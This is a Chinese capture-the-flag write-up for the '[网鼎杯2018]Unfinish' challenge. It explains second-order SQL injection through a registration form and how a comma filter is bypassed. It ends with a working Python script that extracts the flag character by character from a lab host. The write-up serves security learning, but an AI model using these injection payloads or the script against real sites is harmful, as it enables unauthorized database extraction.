[网鼎杯2018]Unfinish
盲猜register界面
打开看什么都没有、
二次注入类题目
绕过方法:
mysql中,+只能当做运算符。
执行select ‘1’+'1a’时 结果
执行select ‘0’+database();
编程了0,但我们可以用ascii编码进行计算。select ‘0’+ascii(substr(database(),1,1));
出来了库名第一位的ascii值。
回到题目
因为过滤了逗号,所以用from for来代替0’+ascii(substr(database() from 1 for 1))+'0;
在这里插入图片描述成功回显,因为过滤了information盲猜flag
#coding:utf-8
import requests
from bs4 import BeautifulSoup
import time
url = 'http://f8ca5469-af8f-41e1-9225-0ad67cdc4490.node4.buuoj.cn:81/'
m = ''
for i in range(100):
payload = "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i+1)
register = {'email':'abc{}@qq.com'.format(i),'username':payload,'password':'123456'}
login = {'email':'abc{}@qq.com'.format(i),'password':'123456'}
req = requests.session()
r1 = req.post(url+'register.php',data = register)
r2 = req.post(url+'login.php', data = login)
r3 = req.post(url+'index.php')
html = r3.text
soup = BeautifulSoup(html,'html.parser')
UserName = soup.span.string.strip()
if int(UserName) == 0:
break
m += chr(int(UserName))
print(m)
time.sleep(1)